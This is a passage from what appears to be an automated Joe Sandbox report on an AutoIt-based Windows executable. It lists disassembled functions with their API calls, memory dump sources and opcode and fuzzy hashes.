                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 357397906-0
                                                                                          • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                          • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                          • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                          • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                                          Function 00436A1D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __wsplitpath.LIBCMT ref: 00436A45
                                                                                            • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                          • __wsplitpath.LIBCMT ref: 00436A6C
                                                                                          • __wcsicoll.LIBCMT ref: 00436A93
                                                                                          • __wcsicoll.LIBCMT ref: 00436AB0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                          • String ID:
                                                                                          • API String ID: 1187119602-0
                                                                                          • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                          • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                                          • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                          • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                                          Function 00437AFE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 1597257046-0
                                                                                          • Opcode ID: a0a60491a2b11ab92cb2618fcf1664bc73e22867390c023d5d6986141a6dc3e0
                                                                                          • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                                          • Opcode Fuzzy Hash: a0a60491a2b11ab92cb2618fcf1664bc73e22867390c023d5d6986141a6dc3e0
                                                                                          • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                                          Function 004555D6 Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteDestroyObject$IconWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3349847261-0
                                                                                          • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                          • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                                          • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                          • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                                          Function 0044B600 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                          • String ID:
                                                                                          • API String ID: 2223660684-0
                                                                                          • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                          • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                                          • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                          • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                                          Function 00447268 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                            • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                            • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                          • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                                          • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                                          • EndPath.GDI32(?), ref: 004472B0
                                                                                          • StrokePath.GDI32(?), ref: 004472BE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                          • String ID:
                                                                                          • API String ID: 2783949968-0
                                                                                          • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                          • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                                          • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                          • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                                          Function 00417D0E Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __getptd.LIBCMT ref: 00417D1A
                                                                                            • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                            • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                          • __getptd.LIBCMT ref: 00417D31
                                                                                          • __amsg_exit.LIBCMT ref: 00417D3F
                                                                                          • __lock.LIBCMT ref: 00417D4F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                          • String ID:
                                                                                          • API String ID: 3521780317-0
                                                                                          • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                          • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                                          • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                          • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                                          Function 00471144 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDesktopWindow.USER32 ref: 00471144
                                                                                          • GetDC.USER32(00000000), ref: 0047114D
                                                                                          • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                                          • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2889604237-0
                                                                                          • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                          • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                                          • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                          • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                                          Function 00471102 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDesktopWindow.USER32 ref: 00471102
                                                                                          • GetDC.USER32(00000000), ref: 0047110B
                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2889604237-0
                                                                                          • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                          • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                                          • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                          • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                                          Function 004389A1 Relevance: 6.0, APIs: 4, Instructions: 27threadwindowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                          • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                          • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2710830443-0
                                                                                          • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                          • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                                          • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                          • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                                          Function 004390C2 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                                          • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                            • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                            • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                          • String ID:
                                                                                          • API String ID: 146765662-0
                                                                                          • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                          • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                                          • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                          • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                                          Function 0041405D Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                                            • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                          • __getptd_noexit.LIBCMT ref: 00414080
                                                                                          • __freeptd.LIBCMT ref: 0041408A
                                                                                          • ExitThread.KERNEL32 ref: 00414093
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                          • String ID:
                                                                                          • API String ID: 3182216644-0
                                                                                          • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                          • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                                          • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                          • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                                                          Function 0046EDC6 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 383COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharLower
                                                                                          • String ID: $8'I
                                                                                          • API String ID: 2358735015-3608026889
                                                                                          • Opcode ID: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                                          • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                                          • Opcode Fuzzy Hash: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                                          • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                                          Function 00478373 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                            • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                            • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                                          • String ID: AutoIt3GUI$Container
                                                                                          • API String ID: 3380330463-3941886329
                                                                                          • Opcode ID: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                                          • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                                          • Opcode Fuzzy Hash: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                                          • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                                          Function 004099A8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 00409A61
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                          • String ID: 0vH
                                                                                          • API String ID: 1143807570-3662162768
                                                                                          • Opcode ID: bf773a96792e7386fbbaa0db16cdf7f70de857e2ea7db1c9c90ef838773f5a19
                                                                                          • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                                          • Opcode Fuzzy Hash: bf773a96792e7386fbbaa0db16cdf7f70de857e2ea7db1c9c90ef838773f5a19
                                                                                          • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
